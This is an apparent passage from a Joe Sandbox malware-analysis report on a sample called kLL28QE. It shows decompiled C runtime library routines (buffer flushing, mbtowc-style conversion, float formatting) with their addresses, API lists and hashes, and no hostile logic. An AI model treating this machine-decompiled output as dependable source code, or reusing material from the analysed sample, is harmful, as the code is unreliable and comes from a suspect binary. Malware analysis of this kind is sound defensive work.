                                                                                                                                                                                                      											_t88 = _t98;
                                                                                                                                                                                                      											__eflags = _t74 - _t98;
                                                                                                                                                                                                      											if(_t74 <= _t98) {
                                                                                                                                                                                                      												_t88 = _t74;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_v8 = _v8 + _t88;
                                                                                                                                                                                                      											_t81 = _t81 - _t88;
                                                                                                                                                                                                      											__eflags = _t74 - _t98;
                                                                                                                                                                                                      											if(_t74 < _t98) {
                                                                                                                                                                                                      												goto L36;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												L27:
                                                                                                                                                                                                      												_t97 = _v16;
                                                                                                                                                                                                      												goto L31;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t77 = E0040C1FB(_t100);
                                                                                                                                                                                                      									__eflags = _t77;
                                                                                                                                                                                                      									if(_t77 != 0) {
                                                                                                                                                                                                      										goto L34;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L21;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t78 =  *(_t100 + 4);
                                                                                                                                                                                                      								__eflags = _t78;
                                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                                      									goto L18;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                                                                                      									_t48 = _t100 + 0xc;
                                                                                                                                                                                                      									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                      									__eflags =  *_t48;
                                                                                                                                                                                                      									goto L34;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t99 = _t81;
                                                                                                                                                                                                      								__eflags = _t81 - _t78;
                                                                                                                                                                                                      								if(_t81 >= _t78) {
                                                                                                                                                                                                      									_t99 = _t78;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                                                                                                                                                      								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                                                                                                                                                      								 *_t100 =  *_t100 + _t99;
                                                                                                                                                                                                      								_t101 = _t101 + 0xc;
                                                                                                                                                                                                      								_t81 = _t81 - _t99;
                                                                                                                                                                                                      								_v8 = _v8 + _t99;
                                                                                                                                                                                                      								goto L27;
                                                                                                                                                                                                      								L31:
                                                                                                                                                                                                      								__eflags = _t81;
                                                                                                                                                                                                      							} while (_t81 != 0);
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t61 = E0040BFC1(_t105);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					 *_t61 = 0x16;
                                                                                                                                                                                                      					E0040E744(_t90, 0, _t100);
                                                                                                                                                                                                      					goto L4;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





























                                                                                                                                                                                                      0x0040baaa
                                                                                                                                                                                                      0x0040baba
                                                                                                                                                                                                      0x0040bae0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bac1
                                                                                                                                                                                                      0x0040bac1
                                                                                                                                                                                                      0x0040bac4
                                                                                                                                                                                                      0x0040bac6
                                                                                                                                                                                                      0x0040bae7
                                                                                                                                                                                                      0x0040baea
                                                                                                                                                                                                      0x0040baec
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040baee
                                                                                                                                                                                                      0x0040baf3
                                                                                                                                                                                                      0x0040baf6
                                                                                                                                                                                                      0x0040baf9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bafe
                                                                                                                                                                                                      0x0040bb02
                                                                                                                                                                                                      0x0040bb09
                                                                                                                                                                                                      0x0040bb0c
                                                                                                                                                                                                      0x0040bb0f
                                                                                                                                                                                                      0x0040bb11
                                                                                                                                                                                                      0x0040bb1b
                                                                                                                                                                                                      0x0040bb13
                                                                                                                                                                                                      0x0040bb16
                                                                                                                                                                                                      0x0040bb16
                                                                                                                                                                                                      0x0040bb22
                                                                                                                                                                                                      0x0040bb24
                                                                                                                                                                                                      0x0040bbe9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bb2a
                                                                                                                                                                                                      0x0040bb2a
                                                                                                                                                                                                      0x0040bb2d
                                                                                                                                                                                                      0x0040bb2d
                                                                                                                                                                                                      0x0040bb33
                                                                                                                                                                                                      0x0040bb64
                                                                                                                                                                                                      0x0040bb64
                                                                                                                                                                                                      0x0040bb67
                                                                                                                                                                                                      0x0040bbc0
                                                                                                                                                                                                      0x0040bbc7
                                                                                                                                                                                                      0x0040bbca
                                                                                                                                                                                                      0x0040bbf5
                                                                                                                                                                                                      0x0040bbf5
                                                                                                                                                                                                      0x0040bbf7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bbfb
                                                                                                                                                                                                      0x0040bbcc
                                                                                                                                                                                                      0x0040bbcf
                                                                                                                                                                                                      0x0040bbd2
                                                                                                                                                                                                      0x0040bbd3
                                                                                                                                                                                                      0x0040bbd6
                                                                                                                                                                                                      0x0040bbd8
                                                                                                                                                                                                      0x0040bbda
                                                                                                                                                                                                      0x0040bbda
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bbd8
                                                                                                                                                                                                      0x0040bb69
                                                                                                                                                                                                      0x0040bb6b
                                                                                                                                                                                                      0x0040bb78
                                                                                                                                                                                                      0x0040bb78
                                                                                                                                                                                                      0x0040bb7c
                                                                                                                                                                                                      0x0040bb7e
                                                                                                                                                                                                      0x0040bb82
                                                                                                                                                                                                      0x0040bb84
                                                                                                                                                                                                      0x0040bb87
                                                                                                                                                                                                      0x0040bb87
                                                                                                                                                                                                      0x0040bb87
                                                                                                                                                                                                      0x0040bb89
                                                                                                                                                                                                      0x0040bb8a
                                                                                                                                                                                                      0x0040bb94
                                                                                                                                                                                                      0x0040bb95
                                                                                                                                                                                                      0x0040bb9a
                                                                                                                                                                                                      0x0040bb9d
                                                                                                                                                                                                      0x0040bba0
                                                                                                                                                                                                      0x0040bc03
                                                                                                                                                                                                      0x0040bc03
                                                                                                                                                                                                      0x0040bc07
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bba2
                                                                                                                                                                                                      0x0040bba2
                                                                                                                                                                                                      0x0040bba4
                                                                                                                                                                                                      0x0040bba6
                                                                                                                                                                                                      0x0040bba8
                                                                                                                                                                                                      0x0040bba8
                                                                                                                                                                                                      0x0040bbaa
                                                                                                                                                                                                      0x0040bbad
                                                                                                                                                                                                      0x0040bbaf
                                                                                                                                                                                                      0x0040bbb1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bbb3
                                                                                                                                                                                                      0x0040bbb3
                                                                                                                                                                                                      0x0040bbb3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bbb3
                                                                                                                                                                                                      0x0040bbb1
                                                                                                                                                                                                      0x0040bba0
                                                                                                                                                                                                      0x0040bb6e
                                                                                                                                                                                                      0x0040bb74
                                                                                                                                                                                                      0x0040bb76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bb76
                                                                                                                                                                                                      0x0040bb35
                                                                                                                                                                                                      0x0040bb38
                                                                                                                                                                                                      0x0040bb3a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bb3c
                                                                                                                                                                                                      0x0040bbf1
                                                                                                                                                                                                      0x0040bbf1
                                                                                                                                                                                                      0x0040bbf1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bbf1
                                                                                                                                                                                                      0x0040bb42
                                                                                                                                                                                                      0x0040bb44
                                                                                                                                                                                                      0x0040bb46
                                                                                                                                                                                                      0x0040bb48
                                                                                                                                                                                                      0x0040bb48
                                                                                                                                                                                                      0x0040bb50
                                                                                                                                                                                                      0x0040bb55
                                                                                                                                                                                                      0x0040bb58
                                                                                                                                                                                                      0x0040bb5a
                                                                                                                                                                                                      0x0040bb5d
                                                                                                                                                                                                      0x0040bb5f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bbe1
                                                                                                                                                                                                      0x0040bbe1
                                                                                                                                                                                                      0x0040bbe1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bb2a
                                                                                                                                                                                                      0x0040bb24
                                                                                                                                                                                                      0x0040bac8
                                                                                                                                                                                                      0x0040bac8
                                                                                                                                                                                                      0x0040bacd
                                                                                                                                                                                                      0x0040bace
                                                                                                                                                                                                      0x0040bacf
                                                                                                                                                                                                      0x0040bad0
                                                                                                                                                                                                      0x0040bad1
                                                                                                                                                                                                      0x0040bad2
                                                                                                                                                                                                      0x0040bad8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040badd

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                                                      • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                                                      • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3240763771-0
                                                                                                                                                                                                      • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                      • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				char _t43;
                                                                                                                                                                                                      				char _t46;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				int _t57;
                                                                                                                                                                                                      				int _t58;
                                                                                                                                                                                                      				signed short* _t59;
                                                                                                                                                                                                      				short* _t60;
                                                                                                                                                                                                      				int _t65;
                                                                                                                                                                                                      				char* _t72;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t72 = _a8;
                                                                                                                                                                                                      				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if( *_t72 != 0) {
                                                                                                                                                                                                      						E0040EC86( &_v20, _a16);
                                                                                                                                                                                                      						_t43 = _v20;
                                                                                                                                                                                                      						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                                                      						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                                                      							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                                                                      							__eflags = _t46;
                                                                                                                                                                                                      							if(_t46 == 0) {
                                                                                                                                                                                                      								__eflags = _a4;
                                                                                                                                                                                                      								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									L10:
                                                                                                                                                                                                      									__eflags = _v8;
                                                                                                                                                                                                      									if(_v8 != 0) {
                                                                                                                                                                                                      										_t53 = _v12;
                                                                                                                                                                                                      										_t11 = _t53 + 0x70;
                                                                                                                                                                                                      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                      										__eflags =  *_t11;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									return 1;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								L21:
                                                                                                                                                                                                      								_t54 = E0040BFC1(__eflags);
                                                                                                                                                                                                      								 *_t54 = 0x2a;
                                                                                                                                                                                                      								__eflags = _v8;
                                                                                                                                                                                                      								if(_v8 != 0) {
                                                                                                                                                                                                      									_t54 = _v12;
                                                                                                                                                                                                      									_t33 = _t54 + 0x70;
                                                                                                                                                                                                      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                      									__eflags =  *_t33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								return _t54 | 0xffffffff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t56 = _v20;
                                                                                                                                                                                                      							_t65 =  *(_t56 + 0xac);
                                                                                                                                                                                                      							__eflags = _t65 - 1;
                                                                                                                                                                                                      							if(_t65 <= 1) {
                                                                                                                                                                                                      								L17:
                                                                                                                                                                                                      								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                                                                                      									goto L21;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = _t72[1];
                                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                                      									goto L21;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								L19:
                                                                                                                                                                                                      								_t57 =  *(_t56 + 0xac);
                                                                                                                                                                                                      								__eflags = _v8;
                                                                                                                                                                                                      								if(_v8 == 0) {
                                                                                                                                                                                                      									return _t57;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                      								return _t57;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _a12 - _t65;
                                                                                                                                                                                                      							if(_a12 < _t65) {
                                                                                                                                                                                                      								goto L17;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _a4;
                                                                                                                                                                                                      							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                      							__eflags = _t58;
                                                                                                                                                                                                      							_t56 = _v20;
                                                                                                                                                                                                      							if(_t58 != 0) {
                                                                                                                                                                                                      								goto L19;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L17;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t59 = _a4;
                                                                                                                                                                                                      						__eflags = _t59;
                                                                                                                                                                                                      						if(_t59 != 0) {
                                                                                                                                                                                                      							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t60 = _a4;
                                                                                                                                                                                                      						if(_t60 != 0) {
                                                                                                                                                                                                      							 *_t60 = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      0x004152a9
                                                                                                                                                                                                      0x004152b0
                                                                                                                                                                                                      0x004152c7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004152b7
                                                                                                                                                                                                      0x004152b9
                                                                                                                                                                                                      0x004152d3
                                                                                                                                                                                                      0x004152d8
                                                                                                                                                                                                      0x004152db
                                                                                                                                                                                                      0x004152de
                                                                                                                                                                                                      0x00415307
                                                                                                                                                                                                      0x0041530e
                                                                                                                                                                                                      0x00415310
                                                                                                                                                                                                      0x00415391
                                                                                                                                                                                                      0x004153ac
                                                                                                                                                                                                      0x004153ae
                                                                                                                                                                                                      0x004152ee
                                                                                                                                                                                                      0x004152ee
                                                                                                                                                                                                      0x004152f1
                                                                                                                                                                                                      0x004152f3
                                                                                                                                                                                                      0x004152f6
                                                                                                                                                                                                      0x004152f6
                                                                                                                                                                                                      0x004152f6
                                                                                                                                                                                                      0x004152f6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004152fc
                                                                                                                                                                                                      0x00415370
                                                                                                                                                                                                      0x00415370
                                                                                                                                                                                                      0x00415375
                                                                                                                                                                                                      0x0041537b
                                                                                                                                                                                                      0x0041537e
                                                                                                                                                                                                      0x00415380
                                                                                                                                                                                                      0x00415383
                                                                                                                                                                                                      0x00415383
                                                                                                                                                                                                      0x00415383
                                                                                                                                                                                                      0x00415383
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00415387
                                                                                                                                                                                                      0x00415312
                                                                                                                                                                                                      0x00415315
                                                                                                                                                                                                      0x0041531b
                                                                                                                                                                                                      0x0041531e
                                                                                                                                                                                                      0x00415345
                                                                                                                                                                                                      0x00415348
                                                                                                                                                                                                      0x0041534e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00415350
                                                                                                                                                                                                      0x00415353
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00415355
                                                                                                                                                                                                      0x00415355
                                                                                                                                                                                                      0x0041535b
                                                                                                                                                                                                      0x0041535e
                                                                                                                                                                                                      0x004152cc
                                                                                                                                                                                                      0x004152cc
                                                                                                                                                                                                      0x00415367
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00415367
                                                                                                                                                                                                      0x00415320
                                                                                                                                                                                                      0x00415323
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00415327
                                                                                                                                                                                                      0x00415338
                                                                                                                                                                                                      0x0041533e
                                                                                                                                                                                                      0x00415340
                                                                                                                                                                                                      0x00415343
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00415343
                                                                                                                                                                                                      0x004152e0
                                                                                                                                                                                                      0x004152e3
                                                                                                                                                                                                      0x004152e5
                                                                                                                                                                                                      0x004152eb
                                                                                                                                                                                                      0x004152eb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004152bb
                                                                                                                                                                                                      0x004152bb
                                                                                                                                                                                                      0x004152c0
                                                                                                                                                                                                      0x004152c4
                                                                                                                                                                                                      0x004152c4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004152c0
                                                                                                                                                                                                      0x004152b9

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                      • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t25 = _a16;
                                                                                                                                                                                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                                                                      					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t34 = _t25 - 0x66;
                                                                                                                                                                                                      					if(_t25 != 0x66) {
                                                                                                                                                                                                      						__eflags = _t25 - 0x61;
                                                                                                                                                                                                      						if(_t25 == 0x61) {
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							__eflags = _t25 - 0x41;
                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                      								goto L7;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						return _t26;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      0x004134e0
                                                                                                                                                                                                      0x004134e6
                                                                                                                                                                                                      0x00413559
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004134ed
                                                                                                                                                                                                      0x004134ed
                                                                                                                                                                                                      0x004134f0
                                                                                                                                                                                                      0x0041350b
                                                                                                                                                                                                      0x0041350e
                                                                                                                                                                                                      0x0041352e
                                                                                                                                                                                                      0x00413540
                                                                                                                                                                                                      0x00413510
                                                                                                                                                                                                      0x00413510
                                                                                                                                                                                                      0x00413513
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00413515
                                                                                                                                                                                                      0x00413527
                                                                                                                                                                                                      0x00413527
                                                                                                                                                                                                      0x00413513
                                                                                                                                                                                                      0x0041355e
                                                                                                                                                                                                      0x00413562
                                                                                                                                                                                                      0x004134f2
                                                                                                                                                                                                      0x0041350a
                                                                                                                                                                                                      0x0041350a
                                                                                                                                                                                                      0x004134f0

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                      • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%